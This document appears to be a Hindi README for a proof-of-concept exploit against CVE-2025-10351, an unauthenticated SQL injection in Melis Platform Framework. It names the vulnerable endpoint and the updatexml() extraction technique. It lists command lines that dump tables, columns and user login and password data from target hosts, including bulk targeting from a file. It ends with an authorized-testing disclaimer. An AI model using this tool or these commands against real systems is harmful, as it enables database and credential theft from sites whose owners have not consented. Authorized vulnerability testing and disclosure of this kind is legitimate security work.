
CVE-2025-10351 के लिए एक्सप्लॉइट। Melis Platform Framework पर SQL इंजेक्शन।
CVE-2025-10351 के लिए POC: एक ऐसी बिना प्रमाणीकरण वाली SQL इंजेक्शन भेद्यता जो Melis Platform Framework में एक विशिष्ट एंडपॉइंट को प्रभावित करती है।
यह POC एंडपॉइंट में बिना प्रमाणीकरण वाली error-based SQL इंजेक्शन भेद्यता को लक्षित करता है:
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
यह निम्न को निकालने के लिए MySQL में updatexml() का उपयोग करता है:
यह आगे मैन्युअल शोषण के लिए संभावित time-based SQLi वेक्टरों का भी पता लगाता है।
निर्भरताएँ इस प्रकार स्थापित करें:
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
tables_extracted.txt में सहेजी गईं<table_name>_data.txt में सहेजा गयायह दस्तावेज़ केवल अधिकृत सुरक्षा परीक्षण और सुधार के लिए है। उन सिस्टमों के विरुद्ध PoC या पुनरुत्पादन चरणों का उपयोग न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है। लेखक दुरुपयोग के लिए ज़िम्मेदार नहीं है।
Manuel Iván San Martín Castillo द्वारा ❤️ के साथ निर्मित
| Argument | Description |
|---|
-u | लक्ष्य URL |
-p | पोर्ट (80, 443, आदि) |
-l | URL सूची वाली फ़ाइल |
-s | time-based परीक्षणों के लिए प्रतीक्षा समय (डिफ़ॉल्ट: 1s) |
-at | सभी टेबल नाम डंप करें |
-t | टेबल नाम निर्दिष्ट करें |
-ac | दिए गए टेबल के सभी कॉलम डंप करें |
-c | डंप करने के लिए कॉलमों की अल्पविराम-पृथक सूची |
--proxy | Burp Proxy http://127.0.0.1:8080 |
--insecure | proxy कनेक्शन का उपयोग करते समय TLS जाँच अक्षम करें |
--cookie | प्रमाणीकरण अनुरोधों के लिए कुकीज़ |
--debug | डीबग मोड |